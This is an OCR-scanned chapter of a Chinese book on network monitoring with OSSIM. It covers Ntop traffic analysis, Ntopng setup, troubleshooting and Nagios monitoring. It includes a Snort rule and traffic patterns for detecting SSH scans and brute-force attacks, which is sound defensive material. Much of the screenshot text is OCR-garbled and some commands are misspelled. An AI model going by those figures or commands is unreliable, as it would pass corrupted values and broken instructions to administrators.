此 返回 了 查询 错误 。 这 些 大 量 的 DNS 请 求 查询 和 返回 错误 的 数据 包 不 但 经 过 公司 内 部 的 交换 
机 ， 还 经 过 路 由 器 和 Internet 出 口 链 路 而 占用 宝贵 的 网 络 资源 ， 对 网 络 通信 质量 产生 了 较 大 的 
影响 ， 在 Ntop 上 的 监控 图 像 ， 如 图 8-41 所 示 。 


Global Protocol Distribution 


TCP |115.3 KBytes. 
99.7x |uoe | 14.3 Mevtes|99.2%| Ee 
ICMP| 5.6 KBytes| oO%) | 


[seme o| 


Protocol 


图 8-41 检测 到 网 络 中 UDP 协议 占 到 99.2% 的 异常 情况 


下 面 我 们 通过 OSSIM 中 集成 的 Ntop 工具 ， 研 究 迅雷 看 看 的 数据 特征 。 首 先 ， 在 经 过 一 
段 时 间 的 抓 包 分 析 后 ， 我 们 打开 Ntop 界面 ， 发 现 默认 情况 下 主机 使 用 UDP 的 12128 端口 在 
与 外 部 大 量 的 TP 进行 数据 传输 ， 而 且 网 络 中 UDP 的 数据 包 占 绝 大 部 分 。 

我 们 发 现 网 络 利用 率 在 80% 以 上 ， 而 当 关 闭 视 频 电 影 以 后 ， 利 用 率 迅速 回落 到 10% 以 下 。 
我 们 可 以 看 到 ， 网 络 数据 包 总 呈现 大 小 包 分 布 两 极 化 趋势 ，65~127 数据 包 占 50% 。 而 
1024-1517 的 数据 包 占 了 3696, 其 余 大 小 的 数据 包 不 到 20%.。 迅 雷 看 看 对 网 络 带 宽 的 消耗 很 大 ， 
可 以 在 很 短 时 间 内 将 网 络 带 宽 充分 占用 ， 这 和 迅雷 看 看 采用 UDP 通信 方式 有 一 定 关系 ，UDP 
通信 本 身 没 有 速度 限制 ， 尽 最 大 可 能 地 利用 网 络 带宽 的 特性 ， 通 常 出 现在 线 点 播 这 种 服务 中 ， 
如 图 8-42 所 示 。 
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E [3 oes| 
packets Regem 00 bes 


693 bytes 
[os | 
i28 < size <2 2560s | se| | 


256 < Size <= 512 bytes 
512 < Size <= 1024 bytes 4.1%] 790 
[1024 < Size <2 1518 byes | 477%| — 296 
Bze»isisbyes | o — 18 


Packets too long [» 1514] 


[Bad Packets (Checksum | oo| o] 

图 8-42 ”数据 包 分 布 

例子 ， Ntop 应 用 -分 析 数据 包 大 小 

首先 进入 Environment 一 Profiles 一 Global 菜单 中 ， 可 以 得 到 全 局 菜单 统计 信息 。 而 在 eth0 
的 流量 报告 中 显示 不 同 大 小 数据 包 所 占 比例 情况 ， 从 而 可 以 找 出 疑似 故障 源 ， 如 图 8-43 所 示 。 


Dropped Gibpcap) oox] 459 
Dropped (mop) oos] ol 
‘Toral Received (rop) 7944053 
Total Packets Processed 7,944,033 
Unicast 5 的。 7512808. 
Broadcast. [rs 30094 
Molticast [17 EE 
Shortest 42 bytes, 
ERAS Average Size £17 bres 
Longest 1514 bytes 
[Se «- 84 byes EF 3546201] 
(64 < Size <= 128 bytes ara| — 212884 
128 < Size <= 256 bytes osx 50,129 
256 < Size <- 512 bytes aax] 48,500 
512 < Size <= 1024 bytes 0.3% 42,483 
T024 < Sue c- [51 Bytes Ease 502233] 
Size > 1518 bytes cox] ol 


图 8-43 不 同 数据 包 所 占 比 例 
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依然 是 这 个 界面 ， 在 图 8-44 中 反映 出 了 监控 网 络 中 的 协议 分 布 情况 。 


8.9 GBytes|33.458.532| 14.5%| EZ 


Other TCP/UDP-based Protocols 


Accumulated View 


Protocols: Historical View 


Bit/s 


li DHCP-BOOTP Max: -nan Avg: -nan 
B Max: 92.3k Avg: 34,4k 

B] Messenger Max: 2.8 Avg: 58.9m 

Historical View D Kazaa Max: 0.0 Avg: 0,0 g 

W news Max: 0.0 Avg: 0.0 

D SSH Max: 10.1k Avg: 1.3k 

gui Max: 13.5 Avg: 1.2 

B ure Max: 480. 4k Avg: 180.7k 

B eDonkey Max: 15.2 Avg: 111.om 

Emil Max: 25.5k Avg: 1.2k 

B ws Max: 0.0 Avg: 0.0 

LI PROXY Max: 4.5k Avg: 33.2 

W NBios-IP Max: 8.9 Avg: 229. 0m 

B SNMP Max: 3.3 Avg: 23.7n 

目 DNS Max: 9,4k Avg: 8.4k 

B Gnutella Max: 0.0 Avg: 0.0 

W WinMX Max: 0.0 Avg: 0.0 

B Telnet Max: 6.0 Avg: 271.5m 


8-44 协议 分 布 情况 


8.4.8 Ntop 的 风险 旗帜 标示 

在 本 地 主机 角色 图 中 我 们 发 现 ， 在 Ntop 里 用 彩旗 的 颜色 来 描述 风险 的 高 低 ， 在 系统 里 用 
绿 旗 局 、 黄 旗 巳 、 红 旗 周 分 别 表示 低 、 中 、 高 风险 程度 。 如 图 8-24 和 图 8-25 所 示 ， 例 如 有 的 
主机 私自 修改 了 MAC， 有 的 主机 发 送 欺 骗 MAC 攻击 的 数据 包 ， 类 似 这 样 的 主机 都 会 被 标记 
红色 旗帜 代表 高 风险 。 

我 们 可 以 使 用 Ntop 分 析 各 主机 的 网 络 使 用 量 ， 了 解 各 个 主机 使 用 带宽 的 比例 。 在 Profiles 
中 打开 Ntop 界面 ， 选 择 “Summary/Host”， 选 择 一 台 主 机 ， 例 如 alienvaultalienvault， 单 击 后 ， 
显示 详细 流量 情况 如 图 8-45 所 示 。 
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Traffic Unit Bytes [v] 
Subnet — Al 
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Host Information sl 


ienvaulcalienvauk O P 


windows-PCP 


dara.atienvaur.com Q Oo | 四 70.38.37.7 


ff02::1:2 02::1:2 


224.0.0.251 


Info about arenvauit alienvauk £ 


192.168.120.77 [unicast] [ Purge Asset & ] 


irst/Last Seen ge 12 168 uo TT 这 村主 机 bi 后 信息 Thu Jan 16 21:18:32 2014 - Thu Jan 16 22:15:12 2014 [Inactive since 0 sec] 
192.168.120.0,24| 

Address W 00:0C-29:98:75.F4 [VMware, Inc.) 

st Location Local (inside specified, local subnet or known network list) 

IP TTL (Time to Live)| 64:64 [-D hop(s)] 
63.2 MBytes 53,443 Pkts O Retran. Pkts [ON] 


ZEE EESREMES 


红色 区 域 的 信 (49. 330. 表示 外 网 流量 比例 0 Pis 


RemOs|* 


—— 
ER 


Total Data Revd 


Non-IP| 
2.1%| 


MBytes; 114,550 Pkts 0 Retran. Pkts [ON] 


tocal 


Et 50.7% 


IP vs. Non-IP Revd 


p-———X A 
49.3 X] 
es LLL. 


Sent vs. Revd Pkts, Ee 


] Revd 


31.8% 682%| 
Seme Revd 
enert 33.9% 66.1% 


图 8-45 


图 8-45 中 ，224.0.0.251 代表 所 有 的 支持 
组 播 的 DNS 服务 器 ， 有 时 候 会 遇 到 一 个 比较 
特别 的 多 播 地 址 239.255.255.250， 往 往 伴随 
占用 大 量 带 宽 。 这 是 因为 有 UPnP 服务 存在 ， 
而 这 个 服务 会 用 SSDP (简单 服务 发 现 协 议 ) 
就 是 用 239.255.255.250 的 多 播 地 址 端口 1900 
来 发 现 UPnp 服务 , 解决 方法 是 在 路 由 器 或 交 
换 机 上 禁用 UPnP 即 可 。 如果 确 定 网 络 中 没有 
流 媒体 服务 器 就 可 以 大 胆 地 将 其 禁用 。 当 
SSH 服务 器 遭受 暴力 破解 攻击 时 ，Ntop 的 取 
样 图 中 数据 包 大 小 分 布 如 图 8-46 所 示 。 

在 OSSIM 的 仪表 盘 上 能 立刻 显示 出 
Recon 报警 数量 ， 也 就 是 在 图 8-47 中 显示 


查看 主机 详情 


Packets 


Shortest 42 bytes 
Average Size 5 bytes! 
Longest 1,514 bytes 
Size <= 64 bytes 10,399,762 
(64 < Size <= 128 bytes 12,648] 
128 < Size <- 256 bytes 2.934 
[256 < Size <= 512 bytes. 483 
512 < Size <= 1024 bytes 1,228 
1024 < Size <= 1518 bytes 45442 
[Size > 1518 bytes 0 
Packets too long [> 1514] 0.0% 0 
[Bad Packets (Checksum) 0.0% 0 


饼 图 面积 最 大 的 区 域 ， 单 击 之 后 会 显示 出 
所 有 Snort 报警 信息 。 


8-46 ”存在 大 量 小 于 64 字 节 的 畸形 帧 


479 


EZ 


Wl intrusion Detection. m 
Operating System 
Web Server Apikai 
Ili Other Devices LÀ W Scspicious 
Alarm — Alam 
Mal Server Mert 


Authentication and DHCP BI Acthenticacior 


Top 10 Event 


II Infrastructure Monitoring I Malvare 
W server meo 
E Application WI Aaiablly 
» Custom Views. 
w Displaying events 150 of about a hundred thousand matching your velection 1Y239 001 events in daabas 
Signature ^ Date GMT-5.00 » Sensor. Source. Destination. A Risk 
E E SR GN anore: "ET SCAN 2004022213270! — 19216811100 x2) Woiisz 16113722 全 Ea mms 
EB TA Gane "ET SCAN 20140222132700 — 92168100 — 19112362239 Wo i92165-11722 Q E š 
网 加 届时 国生 时" 20140222132700 — 192.168.11.100 92.1235.65:23 a9] Host-192:168-11217:22 Q C2 Le 
Enn mcn ND M nn MER 20140222132700 — 192.168.11.100 91.1235.54:23 mg Host-192168-11-17:22 Q CES 1 
528 38/52 GB E Cane "ET SCAN 20140222132700 19216811.100 192123551.23 0 Mot9216811.1722 Q Er Es 
J O 四国 加 加 加 加 加 ror "ET SCAN 20140222132700 1921681400 — i921295252294 —— Wewisiiebi222Q EE A 


Potential SSH Scan” 


图 8-47 OSSIM 显示 的 侦 测报 警 


接着 , 我 们 单 击 其 中 一 条 “ET SCAN protential SSH Scan” 事 件 , 查看 详情 如 图 8-48 所 示 。 


Date Alienvault Sensor Interface. 
20140222 13:27:01 CMT 5:00 alienvault [192.168.11.100] emo 
Triggered Signatur Event Type ID Category Sub-Category 
AT D D GEL C C LR snort- ET SCAN Potential SSH Sean" Recon Misc 
Event Data Source Name Product Type. Data Source ID 
snort n Detection 100 9 
Source Address Source Port Destination Address. Destination Port Protocol 
192.1236.24 gig n IHost-192-1681)-17] 192.168.11.17 Q 2 T 
SIEM Unique Event 1D# Asset5+D Priority Reliability Risk 
9bee! le3. Bbbl-000c 2992.6319obd691d2 n zi [ £1 Es [] 
Context — fvent Context information is only avallable in Allenvault USM Server 
? AlienVault Incident Response: Recon / Misc [Taxonomy] 
KDB 


» AlienVault Incident Response: Recon [Taxonomy 


Payload 


File: amerging-scan rules 
Rule: alert tcp SEXTERNAL NET any > SHOME_NET 22 
msg: "ET SCAN Potential SSH Scan" 
Tes si12 
threshold: type threshold, track by src, count 5, seconds 120 
reference: url ar. wikipedia oro/wiki/Enite force. tace 
reference: urldoc.emergingthrests.net/2001 219 
classtype: attempred-recon 
sid: 2001219 
rev: 18 


8-48 查看 其 中 一 条 事件 的 详情 


从 图 中 Payload 看 出 ， 这 种 连接 负载 (Payload) 长 度 为 6 字 节 ， 这 不 符合 常理 。Ntop 下 
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发 现 蠕虫 攻击 异常 流量 ， 如 图 8-49 所 示 。 


图 8-49 主机 (192.168.11.129) 正在 发 送 扫描 


8.4.9 升级 到 Ntopng 
Ntopng 是 Ntop 下 一 代 版 本 ， 如 果 你 喜欢 Ntopng， 则 需要 从 源码 包 开始 编译 ， 操 作 如 下 : 


(1) 准备 环境 (以 Alienvault USM 4.10 为 例 )。 


(2) 下 载 最 新 ntopng 包 http://sourceforge.net/projects/ntop/files/ntopng/， 接 着 解压 缩 包 。 


将 其 移 到 /opt 目录 下 : 


(3) 开始 编译 。 


执行 完 第 一 步 之 后 出 现 Now run ./configure 提示 ， 这 时 在 当前 目录 产生 configure 文件 。 
/eonfigyre 0000 


执行 该 命令 后 显示 “You are now ready to compile typing make” 说 明 可 以 开始 编译 操作 。 


完成 之 后 会 下 载 他 库 。 
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(4) 启动 Ntopng。 
默认 会 占用 3000 端口 ， 为 了 不 冲突 使 用 3001 端口 。 
#./ntopng -w 3001 
最 后 在 OSSIM 防火 墙 上 允许 访问 3001 端口 , 然后 就 可 以 打开 浏览 器 输入 “服务 器 IP:3001” 


来 访问 ， 因 为 本 实验 在 OSSIM USM 中 完成 ， 所 以 服务 器 IP 即 为 OSSIM USM 的 卫 地 址 。 首 
次 登录 用 户 ， 密 码 均 为 admin Ntop， 工 作 截 图 如 图 8-50 所 示 。 


op | ro 
Host: 192.16811150 — 4f — Traffic — Packets Ports Peers — Protecois ONS HTPO flow Takes curentcotacs @ QR Histor 


Active Flows 


imo — Applcaton ~ L4Proto Clent Server. Duration — ActuMThpt — Total Bytee 
EI ?unmom uoe VrualusMNinonaa .mm1514 smm22s0 。 55896bps 个 5486 MB 
w ? Unknown UDP WrtuaiU SMAlinOng.a... M 12002 15mm 1 sec 181 Mois e 29.46 M8 
EB ?unoowm TCP  ocahostsos4a VruausMAnonaa .mm4o001 7m, lesec obpsy 1sssMB 
CD。 Mene MriusiUSMAlirOne.a.. 12001 Sémm26sec 1249KbUs 135MB 
CI Wenowc ea. 12000 Sémm25sec — A41KbI/s ^ — 61607KB 
EI erow a 12000 Séme.0sc — (NIKE 593.5 KB 
EI ?unoom MrtusiUBMAlTPOne a... 40005 Sémm 17ase — 28945bps 个 16369KB 
cea SH iocainosts2179 54 mn, 14 sec tps — 15129KB 
c3 E iocarosrebg16 54 mn Sseo übx- 623KB 
ca E iocaosraB1 sé mn, 11 aco tps soaa 
ca ES canoskszo1s 34 mn, 12 ec obpsy — sesrk8 
w ES S6 mp, 12 sec Obps=  5579K8 
ca i'mn47sec 289.78 bps 4 44.06 KB 
c3 Bmn, 16sec Obps— 7a2kB 
c3 11 mn, S6 sec Dbps— — 4004KB 
ca ISMArOne n... e3001 P obps assaka 


图 8-50 Ntopng 工作 界面 


故障 排除 


8.5.1 多 网 卡 问题 

OSSIM 系统 中 Ntop 稳定 运行 的 前 提 是 Sensor 工作 状态 正常 ， 和 否则 会 出 现 Ntop 无 法 探测 
数据 的 情况 。 另 外 ， 如 果 系 统 中 安装 了 多 块 网 卡 ， 一 定 要 将 暂时 不 使 用 的 网 卡 去 掉 ， 否 则 也 会 
对 Ntop 运行 造成 影响 ， 例 如 出 现下 列 报错 就 是 多 网 卡 造成 :“Sensor not available please select 
for the above dropdown”。 一 般 处 理 这 种 情况 的 方法 是 ， 到 Sensor configuration 中 ,将 不 用 的 网 
卡 去 掉 ， 即 可 解决 。 


482 


988€ OSSIM 流量 分 析 与 监控 


网 络 中 传输 数据 包 的 大 小 ， 将 直接 反映 网 络 的 通信 状况 ， 并 影响 着 网 络 通信 质量 ， 记 
以 大 家 应 经 常 对 网 络 中 传输 的 数据 包 进 行 检查 , 多 深入 进行 分 析 比 对 , 例如 将 正常 情况 下 
的 图 表 打 印 出 来 以 便 作为 参考 依据 ， 当 出 现 异 常情 况 时 可 以 迅速 进行 比 对 , 以 避免 出 现 该 
类 故障 。 


8.5.2 Ntop Web 页 面 打开 缓慢 对 策 

由 于 在 OSSIM 系统 中 的 Ntop 模块 启动 会 进行 主机 域名 解析 、 会 话 跟踪 ， 当 流量 较 大 
时 ,通常 CPU 负载 较 高 ， 此 时 页 面 载 入 迟缓 ,我们 可 以 修改 /var/lib/ntop/init.cfg 配置 文件 ， 
方法 如 下 : 

#vi /var/lib/ntop/init.cfg 

增加 参数 --disable-mutexextrainfo， 见 下 面 第 三 行内 容 : 


USER-"ntop" 
INTERFACES-"eth0" 
GETOPT-"-t 1 --no-mac -m N"10.32.14.0/24N" -g -n -z --disable-mutexextrainfo" 


保存 ， 退 出 后 ， 再 重启 ntop 进程 /etc/init.d/ntop restarto 
#/etc/init.d/ntop restart 


| 这 里 假设 您 监控 的 网 段 为 “10.32.14.0/24”。 而 且 每 次 升级 OSSIM 系统 之 后 都 需要 检查 
l ”initcfg， 如 果 被 修改 ， 就 需要 改 成 上 文 的 格式 。 


参数 注释 : 

€ n: 只 显示 IP， 不 解析 为 域名 。 

€ -: 关闭 TCP 会 话 追 踪 ， 以 便 获 得 更 好 的 性 能 。 

€  -disable-mutexextrainfo: 关闭 信号 锁定 ， 降 低 资 源 消耗 。 
© -no-mac: 不 显示 网 卡 Mac 地 址 。 


8.5.3 “Sensor not available” 故 障 对 策 


在 使 用 OSSIM 系统 的 Ntop 模块 时 , 出 现 “Sensor not available, please select from the above 
drop down", 如 图 8-51 所 示 。 
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PROFILES 由 
SERVICES GLOBAL THROUGHPUT MATRIX 


SENSOR: [alienvau|v] INTERFACE: [etho jv] BY HOST: TOTAL | BY HOST: SENT | BY HOST: RECV | SER TATISTIC | BY CLIENT-SERVE 


wv Sensor not available, please select from the above dropdown. 


图 8-51 Sensor 失效 


当 出 现 这 种 情况 时 ， 单 击 “GLOBAL (全 局 )” 或 “Matrix” 按 钮 ， 再 刷新 Ntop 页 面 ， 几 
秒 钟 后 即 可 恢复 正常 。 


8.5.4 暂停 Ntop 服务 

如 果 你 希望 在 Sensor. 上 停止 Ntop 服务 , 在 Web UI 界面 上 没有 停止 Ntop 的 按钮 ， 只 能 在 
命令 行 下 停止 。 

#/etc/init.d/ntop stop 

其 实 这 样 操作 并 不 管用 ， 应 为 系统 启用 了 monit 服务 ， 其 中 Ntop 的 monit 服务 会 自动 检 
fr Ntop 是 否 停 止 ， 如 果 停止 会 立即 重启 。 在 OSSIM 系统 中 除了 Ntop 服务 之 外 ， 还 有 
alienvault-api, avdatabase, avopenvas, memcache, avagent, avframework, avsensor, nfcapd, 
avapache, avnagios3, avserver 服务 都 有 这 种 自动 监控 功能 。 这 时 ， 临 时 做 法 是 修改 ntop.monitrc 
文件 。 

vi /etc/monit/alienvault/ntop.monitrc 

停止 ntop 服务 即 可 ， 但 如 果 执 行 了 alienvault-update 升级 指令 ， 这 些 服务 配置 文件 又 会 重 
置 到 初始 状态 。 在 OSSIM 5.1.0 之 后 的 发 行 版 中 便 彻 底 移 除了 NTOP 服务 。 


8.5.5 ”管理 员 密 码 遗 忘 对 策 

很 多 朋友 遇 到 了 不 少 问题 , 其 中 Ntop 的 用 户 密码 文件 是 经 过 加 密 存储 在 ntop_pw.db 文件 
中 ，Ntop 用 户 密码 存储 位 置 : 

€ ”64 位 版 本 : /varlib/ntop_db 64/ntop pw.db 

€ 32 位 版 本 : /var/lib/ntop/ntop_pw.db 


如 果 需 要 修改 admin 密码， 则 分 两 种 情况 ，32 位 版 则 直接 执行 ntop -A ， 即 能 修改 密码 ， 


如 果 是 64 位 版 本 ， 则 需 先 删除 其 密码 文件 ntop_pw.db， 然 后 用 notp -A 重 置 管理 员 密 码 后 ， 
最 后 重启 Ntop 服务 (service ntop restart) 就 能 生效 。 
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用 Nagios 监视 


从 事 运 维 的 工作 人 员 常 管理 着 成 百 上 千 台 设备 ， 对 于 流量 监控 总 找 不 到 一 款 好 用 的 工具 ， 
但 平日 里 工作 事情 很 多 , 总 不 能 天 天 有 杂 着 设备 查看 流量 吧 , 因此 大 家 最 关心 的 是 服务 器 的 监控 
与 报警 问题 。 希望 如 果 机 器 出 故障 了 ,能 第 一 时 间 发 现 并 处 理 。 发 现 机 器 有 没有 问题 ， 对 我 们 
而 言 不 是 什么 难事 。 编 写 脚 本 Ping IP 地 址 以 这 种 方式 来 检测 主机 可 用 性 ，Telnet/SSH 每 台 机 
器 的 管理 端口 如 果 增 加 了 新 机 器 ,就 修改 配置 即 可 。 这 种 原始 方式 让 你 管理 十 几 台 机 器 还 可 以 ， 
如 果 成 百 上 千 台 服务 器 呢 ， 不 但 不 好 维护 和 管理 ， 而 且 也 无 法 打出 报表 。 现 实 中 ， 很 多 人 对 监 
控 程 度 把 握 得 不 好 ,不假思索 地 上 了 一 堆 的 监控 项 目 , 往往 适得其反 。 看 看 下 面 场景 中 主管 与 
管理 员 的 对 话 : 


主管 : 小 张 ， 把 我 们 公司 的 所 有 设备 系统 加 入 到 监控 系统 中 ， 我 想 接收 所 有 的 告警 
消息 。 
管理 员 : 所 有 的 设备 ， 包 括 服务 器 ? 
主管 : 是 的 。 
管理 员 : OK， 没 问题 。 
RER: 
主管 : 昨 晚 一 夜 没 睡 ， 手 机 短信 响 个 不 停 。 不 是 系统 告警 ， 就 是 暴力 破解 告警 提示 ， 要 
么 就 是 扫描 报警 ... 

管理 员 : 不 是 你 说 要 看 所 有 报警 ? 


部 署 监控 系统 可 没有 你 想象 的 那么 容易 ， 在 上 面 的 例子 中 ， 监 控 实 施 得 不 好 ， 反 而 带 来 
麻烦 。 目 前 ， 各 种 监控 软件 层出不穷 ， 大 家 往往 不 知 如 何 选择 ，Nagios 遵从 UNIX 理念 “ 简 
单 实用 ”，Nagios 本 身 己 经 模块 化 ,包含 了 很 多 实用 插件 ，Nagios 对 所 有 插件 状态 进行 跟踪 ， 
可 以 用 来 监视 系统 运行 状态 和 网 络 信息 。Nagios 可 以 监视 所 指定 的 本 地 或 远程 主机 以 及 服务 
同时 提供 异常 通知 功能 。Nagios 可 以 提供 以 下 几 种 监控 功能 。 

€ 监控 网 络 服务 (SMTP. POP3. HTTP 等 ) 可 用 性 。 
监控 主机 资源 ( 处理 器 负载 、 磁 盘 利用 率 等 ) 参数 增 量 变化 。 
简单 的 插件 设计 使 得 用 户 可 以 方便 地 扩展 自己 服务 的 检测 方法 。 

当 服 务 或 主机 问题 产生 可 将 告警 发 送 给 联系 人 (通过 电子 邮件 、 短 信 等 方式 ) 。 
具备 定义 事件 处 理 功能 ， 可 以 在 主机 或 服务 的 事件 发 生 时 获取 更 多 问题 定位 。 
可 选 的 Web 界面 ， 用 于 查看 当前 的 网 络 状 态 消息 、 通 知 故障 等 。 
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8.6.1 Nagios 实现 原理 
Nagios 通常 由 一 个 主 程序 (Nagios)、 一 个 插件 程序 (Nagios-plugins) 和 4 个 可 选 的 ADDON 
(NRPE、NSCA、 NSClientt+ 和 NDOUtils) 组 成 。Nagios 的 监控 工作 都 是 通过 插件 实现 的 ， 
因此 ，Nagios 和 Nagios-plugins 是 服务 器 端 工作 所 必需 的 组 件 ， 可 选 组 件 功能 如 下 : 


(1) NRPE: 用 来 在 监控 的 远程 Linux/Unix 主机 上 执行 脚本 插件 ， 以 实现 对 这 些 主机 资 
源 的 监控 。 

(2)NSCA: 用 来 使 被 监控 的 远程 Linux/Unix 主机 主动 将 监控 信息 发 送 给 Nagios 服务 器 。 

G) NSClientt++: 用 来 监控 安装 在 Windows 主机 上 的 Agent 组 件 。 

(4) NDOUtils: 用 来 将 Nagios 的 配置 信息 和 各 种 事件 产生 的 数据 存 入 数据 库 ， 以 实现 对 
这 些 数据 的 检索 。 


这 4 个 附件 中 NRPE 和 NSClient++ 工 作 于 客户 端 , NDOUtils 工作 于 服务 器 端 ， 而 NSCA 
则 需要 同时 安装 在 服务 器 端 和 客户 端 。 

既然 Nagios 的 功能 是 监控 服务 和 主机 ， 但 是 它 自 身 并 不 包括 这 部 分 功能 ， 所 有 的 监控 、 
检测 功能 都 是 通过 各 种 类 型 插件 来 完成 。 当 启动 Nagios 后 ， 它 会 周期 性 地 自动 调用 插件 来 检 
测 服 务 器 状态 , 同时 Nagios 会 维持 一 个 队列 , 所 有 插件 返回 来 的 状态 信息 都 进入 队列 , Nagios 
每 次 都 从 队 首 开始 读 取信 息 ， 并 进行 处 理 后 ， 把 状态 结果 通过 Web 显示 出 来 。 利 用 Nagios 
尤其 适合 监视 大 量 服 务 器 中 的 大 批 服务 ,但 在 绘图 精细 度 上 确实 不 及 Cacti, 上 一 节 讲解 的 Ntop 
应 用 就 弥补 了 这 一 缺陷 。 

Nagios 提供 的 插件 安装 完成 后 ， 在 Nagios 主 目录 下 的 libexec 里 放 有 Nagios 自 带 的 可 
以 使 用 的 所 有 插件 ， 如 check disk 是 检查 磁盘 空间 的 插件 ，check_load 是 检查 CPU 负载 的 插 
件 等 。 每 一 个 插件 可 以 通过 运行 ./check_xxx -h 来 查看 其 使 用 方法 和 功能 。Nagios 可 以 识别 4 
种 状态 返回 信息 : 

€ 0 (OK) : 表示 状态 正常 。 

1 (WARNING) : 表示 警告 ， 说 明 系 统 出 现 一 定 的 异常 。 
2 (CRITICAL) : 表示 出 现 非常 严重 的 错误 。 
3 (UNKNOWN) : 表示 未 知 ， 实 际 上 被 监控 的 对 象 已 经 停止 或 不 可 达 。 


8.6.2 利用 NRPE 插件 实现 服务 器 监控 


当知 道 Nagios 如 何 通过 插件 来 管理 服务 器 对 象 后 , 现在 开始 研究 它 是 如 何 管理 远 端 服务 
器 对 象 。Nagios 系统 提供 了 一 个 插件 NRPE. Nagios 通过 周期 性 地 运行 它 ， 来 获得 远 端 服务 


器 的 各 种 状态 信息 。 它 们 之 间 的 关系 如 图 8-52 所 示 。 


486 


988€ OSSIM 流量 分 析 与 监控 


send nsca 


check http 远程 
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远程 Windows 主 机 
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snmp 


NOD2DB Deamon 


E 
c 


数据 库 


图 8-52 Nagios 架构 图 


Nagios 根据 插件 返回 值 来 判断 监控 对 象 的 状态 ， 并 通过 Web 显示 出 来 ， 以 供 管理 员 及 时 
发 现 故 障 。Nagios 最 好 用 的 地 方 就 是 它 将 这 些 每 天 管理 员 做 的 工作 自动 化 ， 只 需 设 定好 要 监 
听 的 端口 即 可 ， 它 会 默默 地 工作 ,帮忙 定时 地 去 检测 服务 端口 的 状态 ,一 旦 发 现 问 题 , 会 及 时 
发 出 报警 。Nagios 的 报表 功能 也 很 强大 。 管理 员 可 以 很 容易 获得 到 每 天 、 每 周 和 每 月 的 Service 
运行 状况 。 当 有 了 Nagios， 哪 怕 就 是 管理 上 千 台 机 器 ， 也 不 会 手忙脚乱 ， 而 会 有 一 种 运筹 帷 
惧 的 感觉 。 下 面 我 们 来 了 解 一 下 ， 如 何在 OSSIM 系统 中 使 用 Nagios 系统 。 

刚 安 装 完 OSSIM 系统 ， 并 升级 完成 以 后 ， 就 对 监控 网 段 的 服务 器 或 一 些 重要 客户 机 进行 
扫描 , 首先 选择 右 侧 的 Assets 一 Asset Discovery 菜单 , 这 时 系统 提示 用 户 选择 目标 网 段 。 注 意 ， 
如 果 部 署 了 多 个 Sensor, 那么 嗅 探 对 应 网 段 需要 和 Sensor 相对 应 (sensor 和 待 监控 机 器 属于 同 
一 VLAN 里 )。 比 较 合理 的 方式 就 是 将 服务 器 事先 划分 为 不 同 的 组 ,例如 Web 组 ,Ftp 组 Samba 
组 等 。 当 扫描 开始 时 系统 后 台 调用 Nmap 工具 开始 扫描 网 络 以 收集 数据 ， 配 置 过 程 如 图 8-53 
所 示 。 
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图 8-53 添加 监控 网 段 主机 
目标 主机 扫描 完成 ， 单 击 “Update database values” 把 数据 更 新 到 数据 库 中 。 如 图 8-54 所 


不 。 
Scan results 
" r Insert 
Host Hostname © FQDN Mac OS Services SA 
ssh http 
192.168.120.11 alienvault alienvault alienvault mps v 
mysal 


点 击 此 按钮 以 更 新 数据 库 
—»- Update database values Clear scan result 


854 扫描 主机 结果 


扫描 过 程 中 , 为 节约 时 间 ,建议 关闭 反 向 解析 "Enable reverse DNS Resolution" , 如 图 8-55 
( 所 示 。 


C Automatic sensor Launch sc 


rom the first available sensor 


@ Local sensor Launch scan fror 


> Select an specific sensor 


Scan type Norma — [v] 
Timing template: [Norma — [v] 
[V Autodetect services and Operating System 


T^ Enable reverse DNS Resolution 


8-55 DNS 反 向 解析 
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单 击 “Start Scan" Zl, 屏幕 出 现 “Scanning network (10.32.14.0/24) with local Nmap, please 
wait...”， 这 时 后 台 开 始 调用 nmap 命令 开始 扫描 。 

通过 “ps -ef | grep nmap” 命 令 可 查看 到 命令 执行 的 具体 参数 。 

此 时 ， 系 统 列 出 当前 网 段 内 所 有 扫描 到 的 主机 列表 ,用 户 先 检 查 是 否 和 当前 一 致 ， 然 后 选 
择 某 台 主机 ， 再 选择 修改 按钮 ， 系 统 弹出 此 主机 配置 信息 ,在 配置 界面 可 以 选 监 控 的 设备 属性 
以 及 服务 。 


8.6.3 Nagios 的 Web 界面 
在 OSSIM 中 打开 Nagios 的 方法 是 Environment Availability, WE] 8-56 所 示 。 


DASHBOARDS ANALYSIS 


DS 


ENVIRONMENT REPORTS CONFIGURATION 


AVAILABILITY 
MONITORING REPORTING 


SENSOR. (localhost. $) SERVICE DET. 


ETAIL | STATUS OVERVIEW | STATU: QBLEMS | 
UTAGES | COMMENTS | DOWNTIME | Pi 


SANFO | PERFORMANCE INE 


Host Status Totals. Service Status Totals 
Up Down Unreachable ^ Pending Ok Warning Unknown | Critical ' Pending 
Em o o o mm o D 
All Problems AW Types Ali Problems — All Types 
o D o 7 


Service Overview For All Host Groups > 


AIl Servers (al) Debian GNU/Linux Servers (debian: son. HTTP 
Host Status — Services Actions Host — Status | Services | Actiom Status Services | Actions 


Host-192-168-11-109 I roe A ERR on O MN moi ARA caros C m [T v 
localhost C [E meos ^S 


ssh (ssh) SSH servers (ssh-servers) E 
Status Services ^ Actions Most Status | Services | Actions 


Host 
Host-192.168-11-109 I m 日 吕 on O RM n MBA 
E 8-56 Nagios 主 界面 


d 这 里 大 家 看 到 的 界面 和 传统 Nagios Web 界面 有 些 不 同 ， 这 里 省 去 了 配置 菜单 。 这 个 Web 

| 界面 是 基于 CGI 实现 ,所 以 运行 速度 很 快 ,读者 可 以 在 Ossim 系统 的 /usr/lib/cgi-bin/nagios3/ 
目录 下 查看 所 有 程序 (已 加 密 ) 。 这 些 CGI 脚本 ， 从 Nagios 所 维护 的 var 目录 下 的 多 个 
日 志文 件 中 收集 所 需要 的 信息 。 因 为 完整 的 Web 界面 够 写 一 本 书 了 ， 所 以 下 面 重点 展示 
重要 的 Web 视图 ， 这 些 指标 可 以 反映 主机 资源 可 用 性 。 


1. Monitoring ( 当前 监控 状态 ) 


Service Detail， 服 务 细节 。 
Host Detail， 主 机 细节 。 
Status Overview， 状 态 概览 。 
Status Grid， 网 格 状 态 。 
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Status Map， 状 态 地 图 。 
Service Problems， 服 务 问题 。 
Host Problems， 主 机 问题 。 
Network Outages， 网 络 中 断 。 
Comments， 注 释 。 

Downtime， 宕 机 时 间 。 
Process Info， 进 程 信息 。 
Performance info， 性 能 信息 。 
Scheduling Queue， 计 划 队 列 。 


状态 视图 的 后 台 程 序 主要 是 /usr/lib/cgi-bin/nagios3/status.cgi，Nagios 大 部 分 功能 都 要 与 这 
